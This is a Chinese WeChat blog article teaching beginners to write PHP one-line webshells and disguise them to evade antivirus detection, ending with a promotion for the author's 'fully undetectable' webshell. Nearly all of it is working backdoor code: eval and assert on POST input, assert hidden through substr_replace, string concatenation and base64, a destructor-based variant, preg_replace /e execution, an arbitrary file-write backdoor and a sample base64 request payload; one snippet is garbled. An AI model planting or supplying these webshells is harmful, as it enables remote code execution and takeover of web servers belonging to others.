今天我们简单学习一下php的一句话木马的各种方式,通过学习这些我们可以编写出自己的免杀一句话木马。文章最后附赠免杀一句话。这里较为基础,适合新手入门学习。
基本的一句话
eval($_POST['haha']);
使用assert加载内存
assert($_POST['haha']);
@call_user_func把第一个参数作为回调参数使用
<?php@call_user_func(assert,$_POST['haha']);?>
这里利用substr_replace函数,这个函数啊是那个参数,意思是将第一个字符串,从第四位后面替换成中间的那个值。
$a = substr_replace("assexx","rt",4);$a($_POST['haha']);
利用function函数调用变量a,然后下面给fun1中的变量a赋值assert
function fun1($a){$a($_POST['haha']);}fun1(assert);
方式同上,这里是将post赋值给a
function fun1($a){assert($a);}fun1($_POST['haha']);
换行拼接法
$_REQUEST会将值传递过去,下面使用b和a拼接放到eval中,这里的b的值相当于换行执行。
$a = $_REQUEST['haha'];$b = "n";eval($b.=$a);
面向对象法
这里使用面向对象的一种方式设置obj为一个实例对象,然后对象会赋值a一个post
这里使用public匿名生成一个$a,在下面function__destruct中面向对象赋值给a
class me{public $a = '';function __destruct(){assert("$this->a");}}$obj = new me;$obj->a = $_POST['haha'];
base64加密法
这里将关键的值使用了base64加密,然后放到里面将解密的值赋值给$a,然后a和后面post拼接执行。
$a = base64_decode("YXNzZXJ0");$a($_POST['haha']);
字符分割法
这里将所有的字符分开,然后通过$c结合最后拼接post
$a = "a"."s"."s";$b = "e"."r"."t";$c = $a.$b;$c($_POST['haha']);
这里利用一个正则表达式的方式使用@preg_replace函数,该函数里面有三个内容,第一个是搜索模式,第二个是用于替换的字符串,然后是要搜索替换的目标,效果相当于匹配到nihao,将fun的内容拼接到nihao 后面,前面的正则中/e意思是匹配到带入后立即执行。仅适用php7以下
<?phpfunction fun(){return $_POST['haha'];},"nihao woshi zj");?>
这里属于中介执行,通过读取一个外部传递的文件,然后$d赋值一个data,$$d就相当于成立了一个$data的变量,给他赋值post,下面$f意义同上,相当于我们隐藏建立了一个变量fp给他赋值。fopen函数打开我们传递的文件名文件。
然后下面我们就可以使用fwrite对一个打开的文件$fp进行写入,写入的内容就是我们的另一个隐藏变量$data。后面?是做一个判断,成功返回success,失败返回fail
最后关闭打开的文件$fp
这样我们就可以设置一个文件名写入一个内容。
if(isset($_POST['file'])){$d = 'data';$$d = $_POST['haha'];//$data$f = 'fp';$$f = fopen($_POST['file'],'wb');//$fpecho fwrite($fp,$data)?'save success':'save fail';fclose($fp);}
正则表达式一句话木马
$a = $_POST['haha'];if(isset($a)){@preg_replace("/[(.*)]/e",'\1','[@eval(base64_decode($_POST[z0]));]');}
此时\1为@eval(base64_decode($_POST[z0]));
haha=1&z0=cGhwaW5mbygpOw
这里phpinfo进行一个base64加密传输过去
最后这里我送大家一个我自己写的免杀一句话
是全部免杀的
关注公众号,发送:
我要获取免杀一句话
扫描二维码关注我们吧!
原文始发于微信公众号(白安全组):php一句话免杀简单学习(附赠自用免杀一句话)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论